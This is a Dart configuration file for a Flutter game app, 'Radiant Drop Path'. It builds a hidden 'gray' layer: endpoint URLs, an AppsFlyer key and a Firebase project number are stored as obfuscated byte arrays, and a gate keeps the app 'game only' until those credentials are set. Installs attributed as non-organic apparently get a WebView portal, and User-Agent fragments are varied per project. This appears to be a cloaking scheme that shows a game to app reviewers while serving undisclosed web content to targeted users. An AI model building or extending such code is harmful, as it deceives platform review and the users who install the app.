import '../core/flux_cipher.dart';

/// Central configuration for the flux (gray) layer of Radiant Drop Path.
///
/// All secrets are stored as obfuscated byte arrays (never plaintext). To
/// regenerate: edit the plaintext in tool/encode_flux_values.dart, run
/// `dart run tool/encode_flux_values.dart`, and paste the arrays below. The
/// tool's VERIFY block must round-trip every value exactly.
///
/// The gray gate stays disabled (game only) until `endpoint`, `appsFlyerKey`
/// and `firebaseProjectNumber` are all non-empty.
abstract final class RadiantConfig {
  static const String appTitle = 'Radiant Drop Path';
  static const String bundleId = 'com.radiantdrop.pathgame';

  /// iOS App Store numeric id (used for GCD lookup + store_id).
  static const String iosStoreId = '6792810383';

  static const int pushSnoozeSeconds = 259200; // 3 days
  static const int organicRecheckSeconds = 6;

  /// DEBUG ONLY — force the gray path by injecting `af_status=Non-organic`
  /// into the config POST so the WebView shell can be verified on a real
  /// device without live AppsFlyer attribution. Guarded by kDebugMode, so it
  /// can never affect a release build. Enable for one run with:
  ///   flutter run --dart-define=FORCE_PORTAL=true
  static const bool debugForcePortal =
      bool.fromEnvironment('FORCE_PORTAL', defaultValue: false);

  // ── Encoded secrets (generated by tool/encode_flux_values.dart) ──────────
  // config endpoint — https://radiantdroppath.com/config.php
  static const List<int> _endpoint = <int>[
    18, 196, 170, 84, 9, 227, 108, 189, 92, 52, 242, 175, 54, 133, 50, 213,
    146, 240, 116, 84, 143, 34, 128, 141, 3, 239, 83, 53, 69, 229, 90, 120, 95,
    68, 177, 171, 216, 220,
  ];
  // privacy policy URL — https://radiantdroppath.com/privacy-policy.html
  static const List<int> _privacy = <int>[
    18, 196, 170, 84, 9, 227, 108, 189, 92, 52, 242, 175, 54, 133, 50, 213,
    146, 240, 116, 84, 143, 34, 128, 141, 3, 239, 83, 53, 86, 224, 95, 104, 87,
    64, 230, 236, 192, 211, 49, 246, 92, 26, 136, 126, 184, 236, 236,
  ];
  // support URL — https://radiantdroppath.com/support.html
  static const List<int> _support = <int>[
    18, 196, 170, 84, 9, 227, 108, 189, 92, 52, 242, 175, 54, 133, 50, 213,
    146, 240, 116, 84, 143, 34, 128, 141, 3, 239, 83, 53, 85, 227, 68, 114, 69,
    113, 251, 237, 216, 216, 50, 245,
  ];
  // AppsFlyer GCD base — https://gcdsdk.appsflyer.com/install_data/v5.0/
  static const List<int> _gcd = <int>[
    18, 196, 170, 84, 9, 227, 108, 189, 105, 54, 242, 165, 53, 186, 140, 214,
    148, 241, 113, 90, 242, 41, 131, 73, 78, 27, 85, 119, 137, 239, 90, 117,
    66, 94, 243, 175, 211, 200, 70, 205, 94, 64, 48, 171, 114, 209, 169,
  ];
  // AppsFlyer Dev Key
  static const List<int> _appsFlyerKey = <int>[
    116, 229, 200, 104, 9, 235, 94, 165, 88, 27, 160, 180, 3, 129, 76, 47, 179,
    204, 179, 137, 230, 4,
  ];
  // Firebase project number (GCM_SENDER_ID)
  static const List<int> _firebaseProject = <int>[
    91, 5, 231, 106, 83, 231, 105, 177, 18, 109, 166, 224,
  ];

  // User-Agent version fragments — varied per project (see gray_user_agent).
  static const List<int> _webkit = <int>[92, 56, 235, 22, 75, 239, 110, 179];
  static const List<int> _safari = <int>[91, 0, 228, 111];
  static const List<int> _safariTail = <int>[92, 56, 234, 22, 75];

  // OneLink is OPTIONAL — it must NEVER be part of the gate-enable check.
  static const List<int> _oneLinkHost = <int>[
    24, 233, 186, 93, 59, 175, 43, 130, 92, 34, 230, 232, 32, 133, 67, 45, 141,
    247, 137, 146, 243, 53,
  ];

  static String get endpoint => decodeFlux(_endpoint);
  static String get privacyUrl => decodeFlux(_privacy);
  static String get supportUrl => decodeFlux(_support);
  static String get gcdBase => decodeFlux(_gcd);
  static String get webKitVersion => decodeFlux(_webkit);
  static String get safariVersion => decodeFlux(_safari);
  static String get safariTail => decodeFlux(_safariTail);
  static String get appsFlyerKey => decodeFlux(_appsFlyerKey);
  static String get firebaseProjectNumber => decodeFlux(_firebaseProject);
  static String get oneLinkHost => decodeFlux(_oneLinkHost);

  static String get storeToken => 'id$iosStoreId';

  /// Gate needs config endpoint + AppsFlyer key + Firebase project number.
  /// ⚠️ Do NOT add optional fields (e.g. OneLink) here — a missing optional
  /// value would silently disable the whole gray flow.
  static bool get grayCredentialsReady =>
      endpoint.isNotEmpty &&
      appsFlyerKey.isNotEmpty &&
      firebaseProjectNumber.isNotEmpty;
}
